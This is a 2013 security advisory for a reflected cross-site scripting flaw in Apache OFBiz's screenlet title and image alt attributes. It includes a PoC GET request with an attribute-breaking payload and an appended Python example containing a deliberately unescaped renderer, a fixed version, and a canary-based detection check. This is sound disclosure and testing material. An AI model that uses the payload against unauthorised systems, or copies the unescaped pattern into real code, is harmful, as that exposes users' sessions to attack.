Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Execution of attacker-supplied script in the browser of an authenticated OFBiz user (reflected XSS); the script runs in the victim's session, not as the web server user.
Release Date: 18.01.2013

Summary
=======
Apache Open For Business (Apache OFBiz) is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.

Description
===========
Reflected cross-site scripting vulnerability affecting the Screenlet.title and Image.alt widget attributes: the content of these two elements is not HTML-escaped before being written into the page, so a request parameter that reaches them is rendered verbatim, including quote characters and angle brackets.

Vendor
======
Apache OFBiz - http://ofbiz.apache.org/

PoC
===
The affected resource originally used the HTTP method POST; the request was changed to GET so the issue can be triggered from a single link. Note that the victim must be authenticated to OFBiz for the attack to work: the request below carries a valid session cookie and externalLoginKey.

The URL is crafted as follows to expose the issue:

Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages
Parameter: parentPortalPageId=[XSS]

GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"> HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002

Solution
========
10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02

Vendor Status
=============
[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.
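The following is an added example, not code from the advisory or from Apache OFBiz. It models the escaping defect described under Description and the GET form of the PoC: a stand-in that writes the parentPortalPageId parameter verbatim into a screenlet title and an image alt attribute, the same markup with proper HTML escaping, and a check a tester can run against a response to tell the two apart. The markup, the image path and the harmless <xss-probe> canary tag are assumptions made for illustration; the probe breaks out of the quoted attribute exactly as the EXAMPLE"> prefix in the PoC does, without executing anything.

```python
import html
from urllib.parse import urlencode

# Constructed stand-in for the widget rendering described in the advisory.
# This is NOT Apache OFBiz code: it only models a screenlet title and an
# image alt attribute that interpolate a request parameter without escaping,
# beside a fixed version, and a check that tells the two apart.

# Canary payload (constructed): closes the double-quoted attribute and opens
# a tag no browser executes, so reflection can be confirmed safely.
PROBE = 'EXAMPLE"><xss-probe>'


def render_vulnerable(parent_portal_page_id: str) -> str:
    """Writes the parameter verbatim into the title text and the alt attribute."""
    return (
        '<div class="screenlet-title-bar"><h3>'
        f'Portal page: {parent_portal_page_id}</h3></div>\n'
        f'<img src="/images/portalpage.png" alt="{parent_portal_page_id}">'
    )


def render_fixed(parent_portal_page_id: str) -> str:
    """Same markup; the value is HTML-escaped (quote=True also escapes " and ')."""
    safe = html.escape(parent_portal_page_id, quote=True)
    return (
        '<div class="screenlet-title-bar"><h3>'
        f'Portal page: {safe}</h3></div>\n'
        f'<img src="/images/portalpage.png" alt="{safe}">'
    )


def build_poc_url(base_url: str, payload: str) -> str:
    """Builds the GET form of the PoC request with the payload URL-encoded."""
    return base_url + "?" + urlencode({"parentPortalPageId": payload})


def reflects_unescaped(body: str, probe: str) -> bool:
    """True when the probe appears verbatim in the response body, i.e. the
    attribute delimiter and the angle brackets were not escaped."""
    return probe in body


if __name__ == "__main__":
    url = build_poc_url(
        "https://10.10.10.14:8443/exampleext/control/ManagePortalPages", PROBE)
    print("PoC URL:", url)
    for name, render in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        body = render(PROBE)
        print(f"{name}: reflected unescaped = {reflects_unescaped(body, PROBE)}")
        print(body)
```

Against a live instance, the same reflects_unescaped check applied to the response of the PoC URL (sent with a valid session cookie, as the PoC notes) distinguishes a patched 10.04.05 / 11.04.02 deployment from a vulnerable one without ever running script in a browser.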